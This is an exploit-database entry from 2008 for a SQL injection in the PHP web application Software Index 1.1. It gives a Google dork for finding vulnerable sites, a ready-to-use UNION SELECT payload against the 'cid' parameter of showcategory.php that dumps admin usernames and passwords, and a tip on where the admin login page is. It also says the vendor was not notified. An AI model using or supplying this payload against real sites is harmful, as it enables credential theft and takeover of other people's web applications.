Software Index 1.1 - 'cid' SQL Injection

Author: t0pP8uZz
type: webapps
platform: php
port: 
date_added: 2008-04-04 
date_updated: 2016-11-17 
verified: 1 
codes: OSVDB-44147 
tags: 
aliases:  
screenshot_url:  
application_url: 

--==+================================================================================+==--
--==+		       Software Index 1.1 SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz & xprog
Discovered On: 6 April 2008

Script Download: http://www.turnkeyzone.com

DORK: inurl:"add_soft.php"

Vendor Has Not Been Notified!



DESCRIPTION:
Software Index 1.1 is vulnerable due to multiple insecure mysql querys.



SQL Injection:
http://site.com/showcategory.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(0x3C666F6E7420636F6C6F723D22726564223E,admin_name,0x3a,pwd,0x3C2F666F6E743E),3,4,5/**/FROM/**/sbwmd_admin/*



NOTE/TIP:
admin login is at /siteadmin/



GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



--==+================================================================================+==--
--==+		       Software Index 1.1 SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-05]